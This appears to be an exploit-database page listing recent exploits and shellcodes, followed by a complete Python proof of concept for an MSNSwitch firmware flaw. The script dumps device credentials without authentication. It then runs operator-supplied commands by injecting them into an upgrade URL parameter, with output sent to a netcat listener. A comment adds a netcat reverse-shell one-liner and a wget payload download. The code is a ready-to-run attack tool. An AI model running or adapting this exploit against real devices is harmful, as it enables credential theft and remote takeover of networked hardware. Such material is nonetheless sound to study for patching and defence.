
7 changes to exploits/shellcodes/ghdb AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE) SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution) Open Web Analytics 1.7.3 - Remote Code Execution (RCE) CVAT 2.0 - SSRF (Server Side Request Forgery) IOTransfer V4 - Unquoted Service Path NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass) Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes) Linux/MIPS - reboot() Shellcode (32 bytes) Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes) Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes) Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)
102 lines
No EOL
3.1 KiB
Python
Executable file
102 lines
No EOL
3.1 KiB
Python
Executable file
Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)
|
|
Google Dork: n/a
|
|
Date:9/1/2022
|
|
Exploit Author: Eli Fulkerson
|
|
Vendor Homepage: https://www.msnswitch.com/
|
|
Version: MNT.2408
|
|
Tested on: MNT.2408 firmware
|
|
CVE: CVE-2022-32429
|
|
|
|
#!/usr/bin/python3
|
|
|
|
|
|
"""
|
|
|
|
POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.
|
|
|
|
Configuration dump only requires HTTP access.
|
|
Full RCE requires you to be on the same subnet as the device.
|
|
|
|
"""
|
|
|
|
import requests
|
|
import sys
|
|
import urllib.parse
|
|
import readline
|
|
import random
|
|
import string
|
|
|
|
|
|
# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST
|
|
LISTENER_HOST = "192.168.EDIT.ME"
|
|
LISTENER_PORT = 3434
|
|
|
|
# target msnswitch
|
|
TARGET="192.168.EDIT.ME2"
|
|
PORT=80
|
|
|
|
USERNAME = None
|
|
PASSWORD = None
|
|
|
|
"""
|
|
First vulnerability, unauthenticated configuration/credential dump
|
|
"""
|
|
if USERNAME == None or PASSWORD == None:
|
|
# lets just ask
|
|
hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"
|
|
session = requests.session()
|
|
|
|
data = session.get(hack_url)
|
|
for each in data.text.split('\n'):
|
|
key = None
|
|
val = None
|
|
|
|
try:
|
|
key = each.strip().split('=')[0]
|
|
val = each.strip().split('=')[1]
|
|
except:
|
|
pass
|
|
|
|
if key == "Account1":
|
|
USERNAME = val
|
|
if key == "Password1":
|
|
PASSWORD = val
|
|
|
|
"""
|
|
Second vulnerability, authenticated command execution
|
|
|
|
This only works on the local lan.
|
|
|
|
for full reverse shell, modify and upload netcat busybox shell script to /tmp:
|
|
|
|
shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f
|
|
download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp
|
|
|
|
ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox
|
|
"""
|
|
|
|
session = requests.session()
|
|
|
|
# initial login, establishes our Cookie
|
|
burp0_url = f"http://{TARGET}:{PORT}/goform/login"
|
|
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
|
|
burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}
|
|
session.post(burp0_url, headers=burp0_headers, data=burp0_data)
|
|
|
|
# get our csrftoken
|
|
burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"
|
|
data = session.get(burp0_url)
|
|
|
|
csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]
|
|
|
|
while True:
|
|
CMD = input('x:')
|
|
CMD_u = urllib.parse.quote_plus(CMD)
|
|
filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))
|
|
|
|
try:
|
|
hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}"
|
|
|
|
session.get(hack_url, timeout=0.01)
|
|
except requests.exceptions.ReadTimeout:
|
|
pass |